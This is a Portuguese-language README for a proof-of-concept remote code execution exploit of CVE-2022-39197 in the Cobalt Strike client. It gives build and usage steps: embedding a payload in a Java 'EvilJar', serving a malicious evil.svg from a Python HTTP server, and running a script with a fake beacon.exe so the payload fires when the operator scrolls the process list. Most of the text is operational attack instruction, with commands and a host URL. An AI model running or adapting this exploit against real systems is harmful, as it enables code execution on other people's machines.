
CVE-2022-39197 RCE POC
Este projeto foi modificado a partir do projeto @its-arun https://github.com/its-arun/CVE-2022-39197
Quando testei o script, descobri que o script frida não conseguia consultar os dados na ordem normal. O método de modificar o script frida para alterar o nome do processo.
Agradecimentos ao Mestre @Kai5174 pela sua contribuição ao método de utilização.
Edite o comando executado com seu payload em EvilJar/src/main/java/Exploit.java, atualmente ele só consegue abrir a calculadora.
Compile usando jar mvn clean compile assembly:single
Mova EvilJar-1.0-jar-with-dependencies.jar de EvilJar/target/ para a pasta serve/
Edite serve\evil.svg substituindo
[attacker]Sirva usando python3 -m http.server 8080
Gere beacon.exe com versão do C2 menor ou igual a 4.7
Você precisa executar o script py no Windows para ficar online e realizar contramedidas quando o cliente acessar a lista de processos e ver o processo beacon.exe.
python3 -m pip install -r requirements.txt
python3 cve-2022-39197_Yyy.py beacon.exe http://192.168.10.10:8080/evil.svg
O payload será acionado assim que o usuário rolar a Lista de Processos.
Windows

Mac

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Há uma ótima análise aprofundada dessa vulnerabilidade. https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html
Modificado de https://github.com/its-arun/CVE-2022-39197